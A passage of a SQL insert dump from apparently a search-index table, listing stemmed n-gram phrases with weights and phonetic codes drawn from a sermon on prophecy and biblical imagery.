(293329, 'hands will finish', 'hand will finish', 0, 1, 1.5667, 'H5324152', 1, '*'),
(293330, 'happen till', 'happen till', 0, 1, 1.3667, 'H1534', 1, '*'),
(293331, 'happen till next', 'happen till next', 0, 1, 1.5333, 'H1534523', 1, '*'),
(293332, 'has given to', 'ha given to', 0, 1, 1.4, 'H2153', 1, '*'),
(293333, 'has not been', 'ha not been', 0, 1, 1.4, 'H25315', 1, '*'),
(293334, 'has said and', 'ha said and', 0, 1, 1.4, 'H2353', 1, '*'),
(293335, 'have laid', 'have laid', 0, 1, 1.3, 'H143', 1, '*'),
(293336, 'have laid the', 'have laid the', 0, 1, 1.4333, 'H143', 1, '*'),
(293337, 'have not done', 'have not done', 0, 1, 1.4333, 'H1535', 1, '*'),
(293338, 'he was just', 'he was just', 0, 1, 1.3667, 'H230', 1, '*'),
(293339, 'heart 29', 'heart 29', 0, 1, 1.2667, 'H630', 1, '*'),
(293340, 'heart 29 01', 'heart 29 01', 0, 1, 1.3667, 'H630', 1, '*'),
(293341, 'heights for', 'height for', 0, 1, 1.3667, 'H23216', 1, '*'),
(293342, 'heights for us', 'height for us', 0, 1, 1.4667, 'H232162', 1, '*'),
(293343, 'heights in', 'height in', 0, 1, 1.3333, 'H2325', 1, '*'),
(293344, 'heights in 2017', 'height in 2017', 0, 1, 1.5, 'H2325', 1, '*'),
(293345, 'higher new', 'higher new', 0, 1, 1.3333, 'H265', 1, '*'),
(293346, 'higher new heights', 'higher new heights', 0, 1, 1.6, 'H265232', 1, '*'),
(293347, 'hills', 'hill', 0, 0, 0.3333, 'H420', 1, '*'),
(293348, 'hills like', 'hill like', 0, 1, 1.3333, 'H4242', 1, '*'),
(293349, 'hills like lambs', 'hill like lambs', 0, 1, 1.5333, 'H42424512', 1, '*'),
(293350, 'his job', 'hi job', 0, 1, 1.2333, 'H210', 1, '*'),
(293351, 'his job your', 'hi job your', 0, 1, 1.4, 'H216', 1, '*'),
(293352, 'house of prophecies', 'hous of prophecies', 0, 1, 1.6333, 'H21612', 1, '*'),
(293353, 'i pray that', 'i pray that', 0, 1, 1.3667, 'I163', 1, '*'),
(293354, 'i shall', 'i shall', 0, 1, 1.2333, 'I240', 1, '*'),
(293355, 'i shall long', 'i shall long', 0, 1, 1.4, 'I2452', 1, '*'),
(293356, 'in 2017 in', 'in 2017 in', 0, 1, 1.3333, 'I500', 1, '*'),
(293357, 'in 2017 new', 'in 2017 new', 0, 1, 1.3667, 'I500', 1, '*'),
(293358, 'in 2017 take', 'in 2017 take', 0, 1, 1.4, 'I532', 1, '*'),
(293359, 'in 2017 there', 'in 2017 there', 0, 1, 1.4333, 'I536', 1, '*'),
(293360, 'in 2017”.', 'in 2017”.', 0, 1, 1.3, 'I500', 1, '*'),
(293361, 'in 2017”. enlarge', 'in 2017”. enlarge', 0, 1, 1.5667, 'I5462', 1, '*'),
(293362, 'in the glory', 'in the glory', 0, 1, 1.4, 'I53246', 1, '*'),
(293363, 'in the ongoing', 'in the ongoing', 0, 1, 1.4667, 'I535252', 1, '*'),
(293364, 'in tongues just', 'in tongues just', 0, 1, 1.5, 'I53523', 1, '*'),
(293365, 'in your ancestry', 'in your ancestry', 0, 1, 1.5333, 'I565236', 1, '*'),
(293366, 'in your notebooks', 'in your notebooks', 0, 1, 1.5667, 'I565312', 1, '*'),
(293367, 'into the power', 'into the power', 0, 1, 1.4667, 'I5316', 1, '*'),
(293368, 'is an anointing', 'is an anointing', 0, 1, 1.5, 'I25352', 2, '*'),
(293369, 'israel left', 'israel left', 0, 1, 1.3667, 'I26413', 1, '*'),
(293370, 'israel left egypt', 'israel left egypt', 0, 1, 1.5667, 'I26413213', 1, '*'),
(293371, 'it and you', 'it and you', 0, 1, 1.3333, 'I353', 1, '*'),
(293372, 'it be a', 'it be a', 0, 1, 1.2333, 'I310', 1, '*'),
(293373, 'it continue', 'it continue', 0, 1, 1.3667, 'I32535', 1, '*'),
(293374, 'it continue you', 'it continue you', 0, 1, 1.5, 'I32535', 1, '*'),
(293375, 'it fled', 'it fled', 0, 1, 1.2333, 'I3143', 1, '*'),
(293376, 'it fled jordan', 'it fled jordan', 0, 1, 1.4667, 'I31432635', 1, '*'),
(293377, 'it i', 'it i', 0, 1, 1.1333, 'I300', 1, '*'),
(293378, 'it i shall', 'it i shall', 0, 1, 1.3333, 'I324', 1, '*'),
(293379, 'it not', 'it not', 0, 1, 1.2, 'I353', 1, '*'),
(293380, 'it not stop', 'it not stop', 0, 1, 1.3667, 'I353231', 1, '*'),
(293381, 'it unto', 'it unto', 0, 1, 1.2333, 'I353', 1, '*'),
(293382, 'it unto me', 'it unto me', 0, 1, 1.3333, 'I3535', 1, '*'),
(293383, 'it was said', 'it was said', 0, 1, 1.3667, 'I323', 1, '*'),
(293384, 'it when israel', 'it when israel', 0, 1, 1.4667, 'I35264', 1, '*'),
(293385, 'it you will', 'it you will', 0, 1, 1.3667, 'I340', 1, '*'),
(293386, 'item 20', 'item 20', 0, 1, 1.2333, 'I350', 1, '*'),
(293387, 'item 20 fathers', 'item 20 fathers', 0, 1, 1.5, 'I351362', 1, '*'),
(293388, 'jesus name others', 'jesu name others', 0, 1, 1.5667, 'J5362', 1, '*'),
(293389, 'jesus take', 'jesu take', 0, 1, 1.3333, 'J320', 1, '*'),
(293390, 'jesus take all', 'jesu take all', 0, 1, 1.4667, 'J324', 1, '*'),
(293391, 'job your', 'job your', 0, 1, 1.2667, 'J160', 1, '*'),
(293392, 'job your confession', 'job your confession', 0, 1, 1.6333, 'J1625125', 1, '*'),
(293393, 'jordan was', 'jordan was', 0, 1, 1.3333, 'J6352', 1, '*'),
(293394, 'jordan was driven', 'jordan was driven', 0, 1, 1.5667, 'J63523615', 1, '*'),
(293395, 'just a partaker', 'just a partaker', 0, 1, 1.5, 'J316326', 1, '*'),
(293396, 'just a visitation', 'just a visitation', 0, 1, 1.5667, 'J31235', 1, '*'),
(293397, 'just let the', 'just let the', 0, 1, 1.4, 'J343', 1, '*'),
(293398, 'k2 item 20', 'k2 item 20', 0, 1, 1.3333, 'K350', 1, '*'),
(293399, 'keep declaring', 'keep declaring', 0, 1, 1.4667, 'K1324652', 1, '*'),
(293400, 'keep declaring them', 'keep declaring them', 0, 1, 1.6333, 'K132465235', 1, '*'),
(293401, 'keep speaking', 'keep speaking', 0, 1, 1.4333, 'K121252', 1, '*'),
(293402, 'keep speaking them', 'keep speaking them', 0, 1, 1.6, 'K12125235', 1, '*'),
(293403, 'labour.”', 'labour.”', 0, 0, 0.5333, 'L160', 1, '*'),
(293404, 'labour.” may', 'labour.” may', 0, 1, 1.4, 'L165', 1, '*'),
(293405, 'labour.” may you', 'labour.” may you', 0, 1, 1.5333, 'L165', 1, '*'),
(293406, 'lacked', 'lack', 0, 0, 0.4, 'L230', 1, '*'),
(293407, 'lacked the', 'lack the', 0, 1, 1.3333, 'L230', 1, '*'),
(293408, 'lacked the bible', 'lack the bible', 0, 1, 1.5333, 'L2314', 1, '*'),
(293409, 'laid the', 'laid the', 0, 1, 1.2667, 'L300', 1, '*'),
(293410, 'laid the foundation', 'laid the foundation', 0, 1, 1.6333, 'L31535', 1, '*'),
(293411, 'lambs', 'lamb', 0, 0, 0.3333, 'L512', 1, '*'),
(293412, 'lambs may', 'lamb may', 0, 1, 1.3, 'L5125', 1, '*'),
(293413, 'lambs may you', 'lamb may you', 0, 1, 1.4333, 'L5125', 1, '*'),
(293414, 'left egypt', 'left egypt', 0, 1, 1.3333, 'L13213', 1, '*'),
(293415, 'left egypt the', 'left egypt the', 0, 1, 1.4667, 'L13213', 1, '*'),
(293416, 'let it continue', 'let it continue', 0, 1, 1.5, 'L32535', 1, '*'),
(293417, 'let it not', 'let it not', 0, 1, 1.3333, 'L353', 1, '*'),
(293418, 'let the life', 'let the life', 0, 1, 1.4, 'L341', 1, '*'),
(293419, 'let them decide', 'let them decide', 0, 1, 1.5, 'L35323', 1, '*'),
(293420, 'let your confession', 'let your confession', 0, 1, 1.6333, 'L3625125', 1, '*'),
(293421, 'let yours', 'let yours', 0, 1, 1.3, 'L362', 1, '*'),
(293422, 'let yours be', 'let yours be', 0, 1, 1.4, 'L3621', 1, '*'),
(293423, 'life today with', 'life today with', 0, 1, 1.5, 'L130', 1, '*'),
(293424, 'life what has', 'life what has', 0, 1, 1.4333, 'L132', 1, '*'),
(293425, 'life with them', 'life with them', 0, 1, 1.4667, 'L135', 1, '*'),
(293426, 'life with your', 'life with your', 0, 1, 1.4667, 'L136', 1, '*'),
(293427, 'lifestyle an', 'lifestyl an', 0, 1, 1.4, 'L12345', 1, '*'),
(293428, 'lifestyle an ongoing', 'lifestyl an ongoing', 0, 1, 1.6667, 'L12345252', 1, '*'),
(293429, 'like lambs', 'like lambs', 0, 1, 1.3333, 'L24512', 1, '*'),
(293430, 'like lambs may', 'like lambs may', 0, 1, 1.4667, 'L245125', 1, '*'),
(293431, 'like rams', 'like rams', 0, 1, 1.3, 'L2652', 1, '*'),
(293432, 'like rams and', 'like rams and', 0, 1, 1.4333, 'L265253', 1, '*'),
(293433, 'little hills', 'littl hills', 0, 1, 1.4, 'L342', 1, '*'),
(293434, 'little hills like', 'littl hills like', 0, 1, 1.5667, 'L34242', 1, '*'),
(293435, 'long enjoy', 'long enjoy', 0, 1, 1.3333, 'L5252', 1, '*'),
(293436, 'long enjoy the', 'long enjoy the', 0, 1, 1.4667, 'L52523', 1, '*'),
(293437, 'lord has said', 'lord has said', 0, 1, 1.4333, 'L6323', 1, '*'),
(293438, 'lord my', 'lord my', 0, 1, 1.2333, 'L635', 1, '*'),
(293439, 'lord my hands', 'lord my hands', 0, 1, 1.4333, 'L63532', 1, '*'),
(293440, 'lot added', 'lot added', 0, 1, 1.3, 'L300', 1, '*'),
(293441, 'lot added unto', 'lot added unto', 0, 1, 1.4667, 'L353', 1, '*'),
(293442, 'may go', 'mai go', 0, 1, 1.2, 'M200', 1, '*'),
(293443, 'may go down', 'mai go down', 0, 1, 1.3667, 'M235', 1, '*'),
(293444, 'may you move', 'mai you move', 0, 1, 1.4, 'M100', 1, '*'),
(293445, 'me according', 'me according', 0, 1, 1.4, 'M26352', 1, '*'),
(293446, 'me according to', 'me according to', 0, 1, 1.5, 'M263523', 1, '*'),
(293447, 'mistakes or', 'mistak or', 0, 1, 1.3667, 'M2326', 1, '*'),
(293448, 'mistakes or the', 'mistak or the', 0, 1, 1.5, 'M23263', 1, '*'),
(293449, 'mountains skipped', 'mountain skipped', 0, 1, 1.5667, 'M35213', 1, '*'),
(293450, 'mountains skipped like', 'mountain skipped like', 0, 1, 1.7333, 'M3521342', 1, '*'),
(293451, 'mouth in', 'mouth in', 0, 1, 1.2667, 'M350', 1, '*'),
(293452, 'mouth in the', 'mouth in the', 0, 1, 1.4, 'M353', 1, '*'),
(293453, 'mouth let', 'mouth let', 0, 1, 1.3, 'M343', 1, '*'),
(293454, 'mouth let your', 'mouth let your', 0, 1, 1.4667, 'M3436', 1, '*'),
(293455, 'move when', 'move when', 0, 1, 1.3, 'M150', 1, '*'),
(293456, 'move when the', 'move when the', 0, 1, 1.4333, 'M153', 1, '*'),
(293457, 'move with it', 'move with it', 0, 1, 1.4, 'M130', 1, '*'),
(293458, 'move with the', 'move with the', 0, 1, 1.4333, 'M130', 1, '*'),
(293459, 'moved', 'move', 0, 0, 0.3333, 'M130', 1, '*'),
(293460, 'moved and', 'move and', 0, 1, 1.3, 'M1353', 1, '*'),
(293461, 'moved and they', 'move and they', 0, 1, 1.4667, 'M1353', 1, '*'),
(293462, 'moved they', 'move they', 0, 1, 1.3333, 'M130', 1, '*'),
(293463, 'moved they also', 'move they also', 0, 1, 1.5, 'M1342', 1, '*'),
(293464, 'moved upward', 'move upward', 0, 1, 1.4, 'M13163', 1, '*'),
(293465, 'moved upward and', 'move upward and', 0, 1, 1.5333, 'M1316353', 1, '*'),
(293466, 'moves with', 'move with', 0, 1, 1.3333, 'M123', 1, '*'),
(293467, 'moves with the', 'move with the', 0, 1, 1.4667, 'M123', 1, '*'),
(293468, 'must be “thou', 'must be “thou', 0, 1, 1.4333, 'M2313', 1, '*'),
(293469, 'must operate', 'must operate', 0, 1, 1.4, 'M23163', 1, '*'),
(293470, 'must operate in', 'must operate in', 0, 1, 1.5, 'M231635', 1, '*'),
(293471, 'must wrap', 'must wrap', 0, 1, 1.3, 'M2361', 1, '*'),
(293472, 'must wrap your', 'must wrap your', 0, 1, 1.4667, 'M23616', 1, '*'),
(293473, 'my hands', 'my hands', 0, 1, 1.2667, 'M320', 1, '*'),
(293474, 'my hands have', 'my hands have', 0, 1, 1.4333, 'M321', 1, '*'),
(293475, 'my hands will', 'my hands will', 0, 1, 1.4333, 'M324', 1, '*'),
(293476, 'my labour.”', 'my labour.”', 0, 1, 1.3667, 'M416', 1, '*'),
(293477, 'my labour.” may', 'my labour.” may', 0, 1, 1.5, 'M4165', 1, '*'),
(293478, 'name others', 'name others', 0, 1, 1.3667, 'N362', 1, '*'),
(293479, 'name others may', 'name others may', 0, 1, 1.5, 'N3625', 1, '*'),
(293480, 'nehemiah', 'nehemiah', 0, 0, 0.5333, 'N000', 1, '*'),
(293481, 'nehemiah took', 'nehemiah took', 0, 1, 1.4333, 'N320', 1, '*'),
(293482, 'nehemiah took 52', 'nehemiah took 52', 0, 1, 1.5333, 'N320', 1, '*'),
(293483, 'never lacked', 'never lacked', 0, 1, 1.4, 'N16423', 1, '*'),
(293484, 'never lacked the', 'never lacked the', 0, 1, 1.5333, 'N16423', 1, '*'),
(293485, 'new barriers', 'new barriers', 0, 1, 1.4, 'N162', 1, '*'),
(293486, 'new barriers in', 'new barriers in', 0, 1, 1.5, 'N1625', 1, '*'),
(293487, 'new grounds', 'new grounds', 0, 1, 1.3667, 'N26532', 1, '*'),
(293488, 'new grounds nehemiah', 'new grounds nehemiah', 0, 1, 1.6667, 'N265325', 1, '*'),
(293489, 'new grounds shattering', 'new grounds shattering', 0, 1, 1.7333, 'N265323652', 1, '*'),
(293490, 'new grounds what', 'new grounds what', 0, 1, 1.5333, 'N265323', 1, '*'),
(293491, 'new heights for', 'new heights for', 0, 1, 1.5, 'N23216', 1, '*'),
(293492, 'new heights in', 'new heights in', 0, 1, 1.4667, 'N2325', 1, '*'),
(293493, 'new realms new', 'new realms new', 0, 1, 1.4667, 'N64525', 1, '*'),
(293494, 'new rooms', 'new rooms', 0, 1, 1.3, 'N652', 1, '*'),
(293495, 'new rooms new', 'new rooms new', 0, 1, 1.4333, 'N6525', 1, '*'),
(293496, 'new things new', 'new things new', 0, 1, 1.4667, 'N3525', 1, '*'),
(293497, 'new things we', 'new things we', 0, 1, 1.4333, 'N352', 1, '*'),
(293498, 'not been', 'not been', 0, 1, 1.2667, 'N315', 1, '*'),
(293499, 'not been done', 'not been done', 0, 1, 1.4333, 'N31535', 1, '*'),
(293500, 'not done', 'not done', 0, 1, 1.2667, 'N350', 1, '*'),
(293501, 'not done before', 'not done before', 0, 1, 1.5, 'N3516', 1, '*'),
(293502, 'not everybody', 'not everybody', 0, 1, 1.4333, 'N31613', 1, '*'),
(293503, 'not everybody moves', 'not everybody moves', 0, 1, 1.6333, 'N31613512', 1, '*'),
(293504, 'not everybody sees', 'not everybody sees', 0, 1, 1.6, 'N316132', 1, '*'),
(293505, 'not stop let', 'not stop let', 0, 1, 1.4, 'N323143', 1, '*'),
(293506, 'not the time', 'not the time', 0, 1, 1.4, 'N350', 1, '*'),
(293507, 'note of what', 'note of what', 0, 1, 1.4, 'N313', 1, '*'),
(293508, 'notebooks', 'notebook', 0, 0, 0.6, 'N312', 1, '*'),
(293509, 'notebooks keep', 'notebook keep', 0, 1, 1.4667, 'N3121', 1, '*'),
(293510, 'notebooks keep speaking', 'notebook keep speaking', 0, 1, 1.7667, 'N312121252', 1, '*'),
(293511, 'of god proceed', 'of god proceed', 0, 1, 1.4667, 'O1231623', 1, '*'),
(293512, 'of jesus take', 'of jesus take', 0, 1, 1.4333, 'O1232', 1, '*'),
(293513, 'of my labour.”', 'of my labour.”', 0, 1, 1.4667, 'O15416', 1, '*'),
(293514, 'of prophecies', 'of prophecies', 0, 1, 1.4333, 'O1612', 1, '*'),
(293515, 'of prophecies and', 'of prophecies and', 0, 1, 1.5667, 'O161253', 1, '*'),
(293516, 'of prophecy', 'of prophecy', 0, 1, 1.3667, 'O1612', 1, '*'),
(293517, 'of prophecy as', 'of prophecy as', 0, 1, 1.4667, 'O1612', 1, '*'),
(293518, 'of prophesying', 'of prophesying', 0, 1, 1.4667, 'O161252', 1, '*'),
(293519, 'of prophesying despite', 'of prophesying despite', 0, 1, 1.7333, 'O1612523213', 1, '*'),
(293520, 'of saul', 'of saul', 0, 1, 1.2333, 'O124', 1, '*'),
(293521, 'of saul that', 'of saul that', 0, 1, 1.4, 'O1243', 1, '*'),
(293522, 'of that spirit', 'of that spirit', 0, 1, 1.4667, 'O132163', 1, '*'),
(293523, 'of this building', 'of this building', 0, 1, 1.5333, 'O13214352', 1, '*'),
(293524, 'of what the', 'of what the', 0, 1, 1.3667, 'O130', 1, '*'),
(293525, 'ongoing', 'ongo', 0, 0, 0.4667, 'O5252', 1, '*'),
(293526, 'ongoing 84', 'ongo 84', 0, 1, 1.3333, 'O5252', 1, '*'),
(293527, 'ongoing 84 days', 'ongo 84 days', 0, 1, 1.5, 'O525232', 1, '*'),
(293528, 'ongoing experience', 'ongo experience', 0, 1, 1.6, 'O52521652', 1, '*'),
(293529, 'ongoing experience with', 'ongo experience with', 0, 1, 1.7667, 'O525216523', 1, '*'),
(293530, 'only two directions', 'onli two directions', 0, 1, 1.6333, 'O54362352', 1, '*'),
(293531, 'operate in the', 'oper in the', 0, 1, 1.4667, 'O16353', 1, '*'),
(293532, 'or the attacks', 'or the attacks', 0, 1, 1.4667, 'O632', 1, '*'),
(293533, 'others may', 'other may', 0, 1, 1.3333, 'O3625', 1, '*'),
(293534, 'others may go', 'other may go', 0, 1, 1.4333, 'O36252', 1, '*'),
(293535, 'over your project', 'over your project', 0, 1, 1.5667, 'O161623', 1, '*'),
(293536, 'own mouth', 'own mouth', 0, 1, 1.3, 'O530', 1, '*'),
(293537, 'own mouth let', 'own mouth let', 0, 1, 1.4333, 'O5343', 1, '*'),
(293538, 'partaker', 'partak', 0, 0, 0.5333, 'P6326', 1, '*'),
(293539, 'partaker of', 'partak of', 0, 1, 1.3667, 'P63261', 1, '*'),
(293540, 'partaker of that', 'partak of that', 0, 1, 1.5333, 'P632613', 1, '*'),
(293541, 'perceive', 'perceiv', 0, 0, 0.5333, 'P621', 1, '*'),
(293542, 'perceive it', 'perceiv it', 0, 1, 1.3667, 'P6213', 1, '*'),
(293543, 'perceive it when', 'perceiv it when', 0, 1, 1.5333, 'P62135', 1, '*'),
(293544, 'power of prophecy', 'power of prophecy', 0, 1, 1.5667, 'P61612', 1, '*'),
(293545, 'power of prophesying', 'power of prophesying', 0, 1, 1.6667, 'P6161252', 1, '*'),
(293546, 'pray in tongues', 'prai in tongues', 0, 1, 1.5, 'P65352', 1, '*'),
(293547, 'pray that you', 'prai that you', 0, 1, 1.4333, 'P630', 1, '*'),
(293548, 'prayers you', 'prayer you', 0, 1, 1.3667, 'P620', 1, '*'),
(293549, 'prayers you must', 'prayer you must', 0, 1, 1.5333, 'P62523', 1, '*'),
(293550, 'proceed out', 'proce out', 0, 1, 1.3667, 'P623', 1, '*'),
(293551, 'proceed out of', 'proce out of', 0, 1, 1.4667, 'P6231', 1, '*'),
(293552, 'project', 'project', 0, 0, 0.4667, 'P623', 1, '*'),
(293553, 'project must', 'project must', 0, 1, 1.4, 'P623523', 1, '*'),
(293554, 'project must be', 'project must be', 0, 1, 1.5, 'P6235231', 1, '*'),
(293555, 'prophecies and', 'propheci and', 0, 1, 1.4667, 'P61253', 1, '*'),
(293556, 'prophecies and there', 'propheci and there', 0, 1, 1.6667, 'P612536', 1, '*'),
(293557, 'prophecy as', 'propheci as', 0, 1, 1.3667, 'P612', 1, '*'),
(293558, 'prophecy as you', 'propheci as you', 0, 1, 1.5, 'P612', 1, '*'),
(293559, 'prophecy this', 'propheci this', 0, 1, 1.4333, 'P61232', 1, '*'),
(293560, 'prophecy this year', 'propheci this year', 0, 1, 1.6, 'P612326', 1, '*'),
(293561, 'prophecy will', 'propheci will', 0, 1, 1.4333, 'P6124', 1, '*'),
(293562, 'prophecy will happen', 'propheci will happen', 0, 1, 1.6667, 'P612415', 1, '*'),
(293563, 'prophesy', 'prophesi', 0, 0, 0.5333, 'P612', 1, '*'),
(293564, 'prophesy you', 'prophesi you', 0, 1, 1.4, 'P612', 1, '*'),
(293565, 'prophesy you are', 'prophesi you are', 0, 1, 1.5333, 'P6126', 1, '*'),
(293566, 'prophesying', 'prophesi', 0, 0, 0.7333, 'P61252', 1, '*'),
(293567, 'prophesying despite', 'prophesi despite', 0, 1, 1.6333, 'P612523213', 1, '*'),
(293568, 'prophesying despite all', 'prophesi despite all', 0, 1, 1.7667, 'P6125232134', 1, '*'),
(293569, 'prophesying it', 'prophesi it', 0, 1, 1.4667, 'P612523', 1, '*'),
(293570, 'prophesying it is', 'prophesi it is', 0, 1, 1.5667, 'P6125232', 1, '*'),
(293571, 'prophetic declarations', 'prophet declarations', 0, 1, 1.7333, 'P61323246352', 1, '*'),
(293572, 'prophetic declarations god', 'prophet declarations god', 0, 1, 1.8667, 'P613232463523', 1, '*'),
(293573, 'rams', 'ram', 0, 0, 0.2667, 'R520', 1, '*'),
(293574, 'rams and', 'ram and', 0, 1, 1.2667, 'R5253', 1, '*'),
(293575, 'rams and the', 'ram and the', 0, 1, 1.4, 'R5253', 1, '*'),
(293576, 're-introduce', 're-introduc', 0, 0, 0.8, 'R53632', 1, '*'),
(293577, 're-introduce them', 're-introduc them', 0, 1, 1.5667, 'R5363235', 1, '*'),
(293578, 're-introduce them into', 're-introduc them into', 0, 1, 1.7333, 'R53632353', 1, '*'),
(293579, 'realms new', 'realm new', 0, 1, 1.3333, 'R4525', 1, '*'),
(293580, 'realms new things', 'realm new things', 0, 1, 1.5667, 'R4525352', 1, '*'),
(293581, 'rearrange', 'rearrang', 0, 0, 0.6, 'R520', 1, '*'),
(293582, 'rearrange your', 'rearrang your', 0, 1, 1.4667, 'R526', 1, '*'),
(293583, 'rearrange your life', 'rearrang your life', 0, 1, 1.6333, 'R52641', 1, '*'),
(293584, 'refer to them', 'refer to them', 0, 1, 1.4333, 'R1635', 1, '*'),
(293585, 'rooms', 'room', 0, 0, 0.3333, 'R520', 1, '*'),
(293586, 'rooms new', 'room new', 0, 1, 1.3, 'R525', 1, '*'),
(293587, 'rooms new realms', 'room new realms', 0, 1, 1.5333, 'R5256452', 1, '*'),
(293588, 'said and', 'said and', 0, 1, 1.2667, 'S353', 1, '*'),
(293589, 'said and always', 'said and always', 0, 1, 1.5, 'S35342', 1, '*'),
(293590, 'said of', 'said of', 0, 1, 1.2333, 'S310', 1, '*'),
(293591, 'said of saul', 'said of saul', 0, 1, 1.4, 'S3124', 1, '*'),
(293592, 'saul also', 'saul also', 0, 1, 1.3, 'S420', 1, '*'),
(293593, 'saul also among', 'saul also among', 0, 1, 1.5, 'S4252', 1, '*'),
(293594, 'saul that', 'saul that', 0, 1, 1.3, 'S430', 1, '*'),
(293595, 'saul that “is', 'saul that “is', 0, 1, 1.4333, 'S432', 1, '*'),
(293596, 'saw the', 'saw the', 0, 1, 1.2333, 'S300', 1, '*'),
(293597, 'saw the glory', 'saw the glory', 0, 1, 1.4333, 'S3246', 1, '*'),
(293598, 'says when', 'sai when', 0, 1, 1.3, 'S500', 1, '*'),
(293599, 'says when the', 'sai when the', 0, 1, 1.4333, 'S530', 1, '*'),
(293600, 'sea', 'sea', 0, 0, 0.2, 'S000', 1, '*'),
(293601, 'sea saw', 'sea saw', 0, 1, 1.2333, 'S000', 1, '*'),
(293602, 'sea saw the', 'sea saw the', 0, 1, 1.3667, 'S300', 1, '*'),
(293603, 'see it', 'see it', 0, 1, 1.2, 'S300', 1, '*'),
(293604, 'see it you', 'see it you', 0, 1, 1.3333, 'S300', 1, '*'),
(293605, 'sees', 'see', 0, 0, 0.2667, 'S000', 1, '*'),
(293606, 'sees the', 'see the', 0, 1, 1.2667, 'S300', 1, '*'),
(293607, 'sees the glory', 'see the glory', 0, 1, 1.4667, 'S3246', 1, '*'),
(293608, 'shall long', 'shall long', 0, 1, 1.3333, 'S452', 1, '*'),
(293609, 'shall long enjoy', 'shall long enjoy', 0, 1, 1.5333, 'S45252', 1, '*'),
(293610, 'shattering', 'shatter', 0, 0, 0.6667, 'S3652', 1, '*'),
(293611, 'shattering new', 'shatter new', 0, 1, 1.4667, 'S36525', 1, '*'),
(293612, 'shattering new grounds', 'shatter new grounds', 0, 1, 1.7333, 'S3652526532', 1, '*'),
(293613, 'skipped', 'skip', 0, 0, 0.4667, 'S130', 1, '*'),
(293614, 'skipped like', 'skip like', 0, 1, 1.4, 'S1342', 1, '*'),
(293615, 'skipped like rams', 'skip like rams', 0, 1, 1.5667, 'S1342652', 1, '*'),
(293616, 'soon your', 'soon your', 0, 1, 1.3, 'S560', 1, '*'),
(293617, 'soon your prophecy', 'soon your prophecy', 0, 1, 1.6, 'S561612', 1, '*'),
(293618, 'speak those', 'speak those', 0, 1, 1.3667, 'S1232', 1, '*'),
(293619, 'speak those words', 'speak those words', 0, 1, 1.5667, 'S1232632', 1, '*'),
(293620, 'speaking them', 'speak them', 0, 1, 1.4333, 'S125235', 1, '*'),
(293621, 'speaking them keep', 'speak them keep', 0, 1, 1.6, 'S12523521', 1, '*'),
(293622, 'stop let', 'stop let', 0, 1, 1.2667, 'S3143', 1, '*'),
(293623, 'stop let it', 'stop let it', 0, 1, 1.3667, 'S3143', 1, '*'),
(293624, 'take all', 'take all', 0, 1, 1.2667, 'T240', 1, '*'),
(293625, 'take all the', 'take all the', 0, 1, 1.4, 'T243', 1, '*'),
(293626, 'tapping', 'tap', 0, 0, 0.4667, 'T152', 1, '*'),
(293627, 'tapping into', 'tap into', 0, 1, 1.4, 'T15253', 1, '*'),
(293628, 'tapping into the', 'tap into the', 0, 1, 1.5333, 'T15253', 1, '*'),
(293629, 'that spirit don\'t', 'that spirit don', 0, 1, 1.5667, 'T216353', 1, '*'),
(293630, 'that “is', 'that “is', 0, 1, 1.2667, 'T200', 1, '*'),
(293631, 'that “is saul', 'that “is saul', 0, 1, 1.4333, 'T240', 1, '*'),
(293632, 'the attacks', 'the attacks', 0, 1, 1.3667, 'T200', 1, '*'),
(293633, 'the attacks of', 'the attacks of', 0, 1, 1.4667, 'T210', 1, '*'),
(293634, 'the enemy it', 'the enemy it', 0, 1, 1.4, 'T530', 1, '*'),
(293635, 'the foundation of', 'the foundation of', 0, 1, 1.5667, 'T15351', 1, '*'),
(293636, 'the glory but', 'the glory but', 0, 1, 1.4333, 'T24613', 1, '*'),
(293637, 'the glory by', 'the glory by', 0, 1, 1.4, 'T2461', 1, '*'),
(293638, 'the glory cloud', 'the glory cloud', 0, 1, 1.5, 'T246243', 1, '*'),
(293639, 'the glory it', 'the glory it', 0, 1, 1.4, 'T2463', 1, '*'),
(293640, 'the little', 'the little', 0, 1, 1.3333, 'T434', 1, '*'),
(293641, 'the little hills', 'the little hills', 0, 1, 1.5333, 'T4342', 1, '*'),
(293642, 'the lord my', 'the lord my', 0, 1, 1.3667, 'T4635', 1, '*'),
(293643, 'the mountains', 'the mountains', 0, 1, 1.4333, 'T5352', 1, '*'),
(293644, 'the mountains skipped', 'the mountains skipped', 0, 1, 1.7, 'T535213', 1, '*'),
(293645, 'the ongoing', 'the ongoing', 0, 1, 1.3667, 'T5252', 1, '*'),
(293646, 'the ongoing 84', 'the ongoing 84', 0, 1, 1.4667, 'T5252', 1, '*'),
(293647, 'the prophetic declarations', 'the prophetic declarations', 0, 1, 1.8667, 'T161323246352', 1, '*'),
(293648, 'the sea', 'the sea', 0, 1, 1.2333, 'T200', 1, '*'),
(293649, 'the sea saw', 'the sea saw', 0, 1, 1.3667, 'T200', 1, '*'),
(293650, 'the time to', 'the time to', 0, 1, 1.3667, 'T530', 1, '*'),
(293651, 'their only', 'their only', 0, 1, 1.3333, 'T654', 1, '*'),
(293652, 'their only two', 'their only two', 0, 1, 1.4667, 'T6543', 1, '*'),
(293653, 'them and let', 'them and let', 0, 1, 1.4, 'T5343', 1, '*'),
(293654, 'them decide', 'them decide', 0, 1, 1.3667, 'T5323', 1, '*'),
(293655, 'them decide your', 'them decide your', 0, 1, 1.5333, 'T53236', 1, '*'),
(293656, 'them into', 'them into', 0, 1, 1.3, 'T530', 1, '*'),
(293657, 'them into your', 'them into your', 0, 1, 1.4667, 'T536', 1, '*'),
(293658, 'them keep', 'them keep', 0, 1, 1.3, 'T521', 1, '*'),
(293659, 'them keep declaring', 'them keep declaring', 0, 1, 1.6333, 'T521324652', 1, '*'),
(293660, 'theprophet', 'theprophet', 0, 0, 0.6667, 'T1613', 1, '*'),
(293661, 'theprophet he', 'theprophet he', 0, 1, 1.4333, 'T1613', 1, '*'),
(293662, 'theprophet he was', 'theprophet he was', 0, 1, 1.5667, 'T16132', 1, '*'),
(293663, 'there are a', 'there are a', 0, 1, 1.3667, 'T600', 1, '*'),
(293664, 'there are new', 'there are new', 0, 1, 1.4333, 'T650', 1, '*'),
(293665, 'they also', 'thei also', 0, 1, 1.3, 'T420', 1, '*'),
(293666, 'they also moved', 'thei also moved', 0, 1, 1.5, 'T42513', 1, '*'),
(293667, 'they didn\'t move', 'thei didn move', 0, 1, 1.5333, 'T5351', 1, '*'),
(293668, 'they never lacked', 'thei never lacked', 0, 1, 1.5667, 'T516423', 1, '*'),
(293669, 'things new', 'thing new', 0, 1, 1.3333, 'T525', 1, '*'),
